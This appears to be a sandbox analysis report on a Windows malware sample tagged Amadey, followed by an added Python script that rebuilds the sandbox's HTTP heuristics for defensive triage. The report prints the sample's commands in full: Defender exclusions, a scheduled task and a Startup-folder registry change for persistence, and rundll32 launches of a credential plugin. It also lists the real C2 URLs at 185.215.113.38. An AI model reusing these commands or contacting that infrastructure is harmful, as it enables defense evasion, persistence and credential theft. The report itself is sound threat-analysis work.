Summary | ZeroBOX

ao.exe

Amadey Antivirus Code injection HTTP PWS Internet API Http API .NET EXE DLL JPEG Format PE32 PE File AntiVM AntiDebug
Category: FILE
Machine: s1_win7_x6401
Started: May 31, 2021, 11:01 a.m.
Completed: May 31, 2021, 11:04 a.m.
Size 3.6MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 b1d319888860b7a6400c5e5099d59e48
SHA256 87178907c9c47a383a2a08a30481dbc5345b6c85c48142a855900d9840e6b6da
CRC32 FDE0930B
ssdeep 12288:0DRxaOwYtrsWvNL4RgjWV3ny0qxwCnLRMdgE57lU8SalS11vCmNV3nrOh5A/OYLI:v
Yara
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • Admin_Tool_IN_Zero - Admin Tool Sysinternals
  • IsPE32 - (no description)

Hosts (Name | Response | Post-Analysis Lookup): No hosts contacted.

IP Address | Status | Action
164.124.101.2 | Active | Moloch
185.215.113.38 | Active | Moloch

API | Arguments | Status Return Repeated
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
API | Arguments | Status Return Repeated
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
API | buffer | console_handle | Status Return Repeated
WriteConsoleW | The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function | 0x00000023 | 1 1 0
WriteConsoleW | , script file, or operable program. Check the spelling of the name, or if a pat | 0x0000002f | 1 1 0
WriteConsoleW | h was included, verify that the path is correct and try again. | 0x0000003b | 1 1 0
WriteConsoleW | At line:1 char:17 | 0x00000047 | 1 1 0
WriteConsoleW | + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\ao.e | 0x00000053 | 1 1 0
WriteConsoleW | xe -Force | 0x0000005f | 1 1 0
WriteConsoleW | + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co | 0x0000006b | 1 1 0
WriteConsoleW | mmandNotFoundException | 0x00000077 | 1 1 0
WriteConsoleW | + FullyQualifiedErrorId : CommandNotFoundException | 0x00000083 | 1 1 0
WriteConsoleW | Waiting for 1 | 0x00000007 | 1 1 0
WriteConsoleW | seconds, press a key to continue ... | 0x00000007 | 1 1 0
WriteConsoleW | The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function | 0x00000023 | 1 1 0
WriteConsoleW | , script file, or operable program. Check the spelling of the name, or if a pat | 0x0000002f | 1 1 0
WriteConsoleW | h was included, verify that the path is correct and try again. | 0x0000003b | 1 1 0
WriteConsoleW | At line:1 char:17 | 0x00000047 | 1 1 0
WriteConsoleW | + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\9be4 | 0x00000053 | 1 1 0
WriteConsoleW | a78dfb\blfte.exe -Force | 0x0000005f | 1 1 0
WriteConsoleW | + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co | 0x0000006b | 1 1 0
WriteConsoleW | mmandNotFoundException | 0x00000077 | 1 1 0
WriteConsoleW | + FullyQualifiedErrorId : CommandNotFoundException | 0x00000083 | 1 1 0
WriteConsoleW | Waiting for 1 | 0x00000007 | 1 1 0
WriteConsoleW | seconds, press a key to continue ... | 0x00000007 | 1 1 0
WriteConsoleW | SUCCESS: The scheduled task "blfte.exe" has successfully been created. | 0x00000007 | 1 1 0
WriteConsoleW | The operation completed successfully. | 0x00000007 | 1 1 0

Console output of the spawned children (the buffers are 80-column console wraps, one WriteConsoleW call per line fragment). Both Add-MpPreference attempts, for ao.exe and then for the dropped blfte.exe, fail with CommandNotFoundException because the Defender cmdlets are not available on the Windows 7 analysis machine, so no exclusion was actually added in this run. The schtasks and reg.exe commands succeed ("SUCCESS: The scheduled task ..." and "The operation completed successfully.").
API | crypto_handle (all other arguments identical: buffer <INVALID POINTER>, flags 0, crypto_export_handle 0x00000000, blob_type 6) | Status Return Repeated
CryptExportKey | 0x007f7640 | 1 1 0
CryptExportKey | 0x007f7740 | 1 1 0
CryptExportKey | 0x007f7740 | 1 1 0
CryptExportKey | 0x004c9358 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9c58 | 1 1 0
CryptExportKey | 0x004c9c58 | 1 1 0
CryptExportKey | 0x004c9c58 | 1 1 0
CryptExportKey | 0x004c9c58 | 1 1 0
CryptExportKey | 0x004c9c58 | 1 1 0
CryptExportKey | 0x004c9c58 | 1 1 0
CryptExportKey | 0x004c97d8 | 1 1 0
CryptExportKey | 0x004c97d8 | 1 1 0
CryptExportKey | 0x004c97d8 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9418 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c9918 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c8fd8 | 1 1 0
CryptExportKey | 0x004c94d8 | 1 1 0
CryptExportKey | 0x004c94d8 | 1 1 0
CryptExportKey | 0x004c94d8 | 1 1 0
CryptExportKey | 0x004c94d8 | 1 1 0
CryptExportKey | 0x004c94d8 | 1 1 0
CryptExportKey | 0x004c94d8 | 1 1 0
CryptExportKey | 0x004c94d8 | 1 1 0
CryptExportKey | 0x004c94d8 | 1 1 0
CryptExportKey | 0x007bc0a8 | 1 1 0

blob_type 6 is PUBLICKEYBLOB. Every call reports success while the output buffer could not be read by the monitor (<INVALID POINTER>), which is consistent with the size-query first call of the CryptExportKey two-call pattern (NULL pbData, required length returned in pdwDataLen); no exported key bytes appear in this trace.
API | Arguments | Status Return Repeated
GlobalMemoryStatusEx | (none) | 1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x4d6376
0x4d58cf
0x4d0ef7
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d3711 @ 0x6ff13711
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d36ad @ 0x6ff136ad
mscorlib+0x308f2d @ 0x6ff48f2d
microsoft+0x50c17 @ 0x72460c17
microsoft+0x3f33f @ 0x7244f33f
microsoft+0x3edf8 @ 0x7244edf8
microsoft+0x3e3b9 @ 0x7244e3b9
0x4d025a
0x4d01b6
0x4d0076
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7289416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7376f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 8b 01 eb 3e 8d 55 e0 0f b6 01 88 02 0f b6 41 01
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol: mscorlib+0x324f62
exception.address: 0x6ff64f62
registers.esp: 3663236
registers.edi: 3663260
registers.eax: 0
registers.ebp: 3663272
registers.edx: 0
registers.ebx: 116165396
registers.esi: 4194364
registers.ecx: 4194364
1 0 0

__exception__

stacktrace:
0x576376
0x5758cf
0x570ef7
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x726c2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x726d264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72741838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72741737
mscorlib+0x2d3711 @ 0x6ef53711
mscorlib+0x308f2d @ 0x6ef88f2d
mscorlib+0x2cb060 @ 0x6ef4b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x726c2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x726d264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72741838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72741737
mscorlib+0x2d36ad @ 0x6ef536ad
mscorlib+0x308f2d @ 0x6ef88f2d
microsoft+0x50c17 @ 0x723d0c17
microsoft+0x3f33f @ 0x723bf33f
microsoft+0x3edf8 @ 0x723bedf8
microsoft+0x3e3b9 @ 0x723be3b9
0x57025a
0x5701b6
0x570076
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x726d264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x726d2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727874ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72787610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72811dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72811e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72811f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7281416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d6f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73717f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73714de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 8b 01 eb 3e 8d 55 e0 0f b6 01 88 02 0f b6 41 01
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol: mscorlib+0x324f62
exception.address: 0x6efa4f62
registers.esp: 4252644
registers.edi: 4252668
registers.eax: 0
registers.ebp: 4252680
registers.edx: 0
registers.ebx: 116421008
registers.esi: 4194364
registers.ecx: 4194364
1 0 0
Suspicious HTTP requests (Method | URL | suspicious_features):
POST | http://185.215.113.38/fT5YhO/index.php | POST method with no referer header, POST method with no useragent header, Connection to IP address
GET | http://185.215.113.38/fT5YhO/plugins/cred.dll | GET method with no useragent header, Connection to IP address
GET | http://185.215.113.38/fT5YhO/plugins/scr.dll | GET method with no useragent header, Connection to IP address
POST | http://185.215.113.38//fT5YhO/index.php | POST method with no referer header, POST method with no useragent header, Connection to IP address
POST | http://185.215.113.38//fT5YhO/index.php?scr=up | POST method with no referer header, Connection to IP address

HTTP requests, in order:
POST http://185.215.113.38/fT5YhO/index.php
GET http://185.215.113.38/fT5YhO/plugins/cred.dll
GET http://185.215.113.38/fT5YhO/plugins/scr.dll
POST http://185.215.113.38//fT5YhO/index.php
POST http://185.215.113.38//fT5YhO/index.php?scr=up
POST http://185.215.113.38/fT5YhO/index.php
POST http://185.215.113.38//fT5YhO/index.php
POST http://185.215.113.38//fT5YhO/index.php?scr=up

All traffic goes to the bare IP 185.215.113.38 over plain HTTP: POSTs to /fT5YhO/index.php, two plugin DLLs (cred.dll, scr.dll) fetched from /fT5YhO/plugins/ (they land in C:\ProgramData\1428cad52d922f\, see the dropped-file list further down), and the ?scr=up POSTs that follow the scr.dll download, which are the only requests the sandbox did not flag for a missing User-Agent.
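The suspicious_features labels above are the sandbox's per-request heuristics. The Python below is an added example, not part of the ZeroBOX report: it reimplements those three checks (POST without a Referer, any request without a User-Agent, host given as an IP literal) over raw HTTP request heads, so the same triage can be run against a proxy log or PCAP export. The request heads in SAMPLE_REQUESTS are constructed to mirror the URLs on this page; the headers the sample actually sent are not in the report, so the User-Agent on the ?scr=up upload is an assumption made so that request reproduces the feature set the sandbox listed for it.

```python
import ipaddress
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed sample request heads modelled on the URLs in this report.
# The real headers are not in the report; the User-Agent on "screenshot"
# is assumed so that its feature set matches the sandbox listing.
SAMPLE_REQUESTS = {
    "checkin": (
        "POST /fT5YhO/index.php HTTP/1.1\r\n"
        "Host: 185.215.113.38\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 0\r\n\r\n"
    ),
    "plugin": (
        "GET /fT5YhO/plugins/cred.dll HTTP/1.1\r\n"
        "Host: 185.215.113.38\r\n\r\n"
    ),
    "screenshot": (
        "POST //fT5YhO/index.php?scr=up HTTP/1.1\r\n"
        "Host: 185.215.113.38\r\n"
        "User-Agent: Mozilla/4.0\r\n"          # assumed header, see above
        "Content-Length: 0\r\n\r\n"
    ),
    "benign": (
        "POST /login HTTP/1.1\r\n"
        "Host: portal.example.test\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Referer: https://portal.example.test/\r\n\r\n"
    ),
}


@dataclass
class HttpRequest:
    method: str
    url: str
    headers: dict = field(default_factory=dict)  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse the head (request line + headers) of a raw HTTP/1.x request."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if target.lower().startswith(("http://", "https://")):
        url = target                                  # absolute-form target
    else:
        url = "http://" + headers.get("host", "") + target
    return HttpRequest(method.upper(), url, headers)


def is_ip_literal(host: str) -> bool:
    """True when the host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def suspicious_features(req: HttpRequest) -> list:
    """The three per-request heuristics, worded as the report prints them."""
    feats = []
    if req.method == "POST" and "referer" not in req.headers:
        feats.append("POST method with no referer header")
    if "user-agent" not in req.headers:
        feats.append(f"{req.method} method with no useragent header")
    if is_ip_literal(urlsplit(req.url).hostname or ""):
        feats.append("Connection to IP address")
    return feats


def triage(samples: dict) -> dict:
    """Map each sample name to (url, features) so hits can be reviewed."""
    out = {}
    for name, raw in samples.items():
        req = parse_request(raw)
        out[name] = (req.url, suspicious_features(req))
    return out


if __name__ == "__main__":
    for name, (url, feats) in triage(SAMPLE_REQUESTS).items():
        print(f"{name:10s} {url}\n{'':10s} {', '.join(feats) or '(none)'}")
```

A missing User-Agent on its own is weak evidence (many updaters omit it); the combination with an IP-literal host and a POST that carries no Referer is what makes the index.php traffic stand out, which is why the function returns the full feature list rather than a single verdict.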
All rows: protection 64 (PAGE_EXECUTE_READWRITE), process_handle 0xffffffff (current-process pseudo-handle, i.e. in-process allocations), stack_dep_bypass 0, stack_pivoted 0, Status Return Repeated 1 0 0. NtProtectVirtualMemory rows give length in the size column and have no allocation_type.

API | PID | base_address | size | allocation_type | heap_dep_bypass
NtAllocateVirtualMemory | 2648 | 0x00cf0000 | 1769472 | 8192 (MEM_RESERVE) | 0
NtAllocateVirtualMemory | 2648 | 0x00e60000 | 4096 | 4096 (MEM_COMMIT) | 1
NtProtectVirtualMemory | 2648 | 0x72741000 | 4096 (length) | – | 0
NtProtectVirtualMemory | 2648 | 0x72742000 | 4096 (length) | – | 0
NtAllocateVirtualMemory | 2648 | 0x005d0000 | 1376256 | 8192 (MEM_RESERVE) | 0
NtAllocateVirtualMemory | 2648 | 0x006e0000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x00392000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x003ac000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x004d0000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x003c5000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x003cb000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x003c7000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x003ba000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x003b7000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x0039a000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x0039c000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x003b6000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x004d1000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0xfff40000 | 327680 | 1056768 (MEM_RESERVE+MEM_TOP_DOWN) | 0
NtAllocateVirtualMemory | 2648 | 0xfff40000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0xfff40000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0xfff48000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0xfff30000 | 65536 | 1056768 (MEM_RESERVE+MEM_TOP_DOWN) | 0
NtAllocateVirtualMemory | 2648 | 0xfff30000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x004d2000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x004d3000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x004d4000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x004d5000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2648 | 0x004d6000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x02820000 | 2293760 | 8192 (MEM_RESERVE) | 0
NtAllocateVirtualMemory | 2448 | 0x02a10000 | 4096 | 4096 (MEM_COMMIT) | 1
NtProtectVirtualMemory | 2448 | 0x6d8b1000 | 4096 (length) | – | 0
NtAllocateVirtualMemory | 2448 | 0x0268a000 | 4096 | 4096 (MEM_COMMIT) | 1
NtProtectVirtualMemory | 2448 | 0x6d8b2000 | 8192 (length) | – | 0
NtAllocateVirtualMemory | 2448 | 0x02682000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x026d2000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x02a11000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x02a12000 | 8192 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x026fa000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x026d3000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x026d4000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x0270b000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x02707000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x0268b000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x026f2000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x02705000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x026d5000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x026fc000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x029e0000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 2448 | 0x026d6000 | 4096 | 4096 (MEM_COMMIT) | 1
description: blfte.exe tried to sleep 293 seconds, actually delayed analysis time by 293 seconds

Files:
  • C:\ProgramData\1428cad52d922f\scr.dll
  • C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
  • C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat
  • C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe
  • C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat
  • C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
  • C:\ProgramData\1428cad52d922f\cred.dll
  • C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Command lines:
  • "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
  • "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ao.exe" -Force
  • powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" -Force
  • "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" -Force
  • "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
  • powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ao.exe" -Force
  • cmd.exe /c timeout 1
  • "C:\Windows\System32\cmd.exe" /c timeout 1
  • SCHTASKS /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\a2ad8163-11d5-4f89-89e5-fc093bda31ef\AdvancedRun.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ao.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe
parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\6124f2a7-8a2c-4783-89ce-0314c0f4a84f\AdvancedRun.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\test22\AppData\Local\Temp\9be4a78dfb\
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN blfte.exe /TR "C:\Users\test22\AppData\Local\Temp\9be4a78dfb\blfte.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\ProgramData\1428cad52d922f\cred.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\ProgramData\1428cad52d922f\scr.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer:
request_handle: 0x00cc0018
1 1 0

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communications over HTTP rule Network_HTTP
